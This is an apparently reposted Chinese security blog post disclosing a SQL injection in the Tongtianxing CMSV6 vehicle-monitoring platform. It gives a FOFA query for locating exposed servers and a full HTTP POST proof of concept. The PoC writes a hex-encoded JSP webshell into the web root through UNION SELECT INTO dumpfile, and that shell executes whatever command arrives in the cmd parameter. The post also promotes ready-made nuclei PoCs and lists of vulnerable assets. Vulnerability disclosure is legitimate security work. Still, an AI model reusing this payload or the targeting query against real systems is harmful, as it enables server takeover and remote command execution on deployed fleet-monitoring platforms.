漏洞简介
通天星CMSV6车载定位监控平台拥有以位置服务、无线3G14G视频传输、云存储服务为核心的研发团队,专注于为定位、无线视频终端产品提供平台服务,通天星CMSV6产品覆盖车载录像机、单兵录像机、网络监控摄像机、行驶记录仪等产品的视频综合平台。
由于通天星CMSV6车载定位监控平台未对用户的输入进行预编译,直接将其拼接进了SQL查询语句中,导致系统出现SQL注入漏洞。该漏洞可通过SQL注入实现文件写入进行远程代码执行,获取服务器权限。
影响版本
全版本
资产测绘
fofa:body="/808gps/"
关注公众号:"simple学安全",回复20240702POC即可获取nuclei形式的POC以及fofa语句查询后的资产。
漏洞poc
POST /point_manage/merge HTTP/1.1Host: {{Hostname}}User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.2882.93 Safari/537.36Connection: closeContent-Length: 853Content-Type: application/x-www-form-urlencodedAccept-Encoding: gzipid=1&name=1' UNION SELECT%0aNULL, 0x3c25206a6176612e696f2e496e70757453747265616d20696e203d2052756e74696d652e67657452756e74696d6528292e6578656328726571756573742e676574506172616d657465722822636d642229292e676574496e70757453747265616d28293b696e742061203d202d313b627974655b5d2062203d206e657720627974655b323034385d3b6f75742e7072696e7428223c7072653e22293b7768696c652828613d696e2e7265616428622929213d2d31297b6f75742e7072696e746c6e286e657720537472696e6728622c302c6129293b7d6f75742e7072696e7428223c2f7072653e22293b6e6577206a6176612e696f2e46696c65286170706c69636174696f6e2e6765745265616c5061746828726571756573742e676574536572766c657450617468282929292e64656c65746528293b253e,NULL,NULL,NULL,NULL,NULL,NULL INTO dumpfile '../../tomcat/webapps/gpsweb/test.jsp' FROM user_session a WHERE '1 '='1 &type=3&map_id=4&install_place=5&check_item=6&create_time=7&update_time=8
利用成功会在根目录写入一个test.jsp木马,读取GET请求方式的cmd参数作为命令执行:
关注公众号:"simple学安全",回复20240702POC即可获取nuclei形式的POC以及fofa语句查询后的资产。
原文始发于微信公众号(simple学安全):1day|通天星CMSV6 merge SQL注入漏洞
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论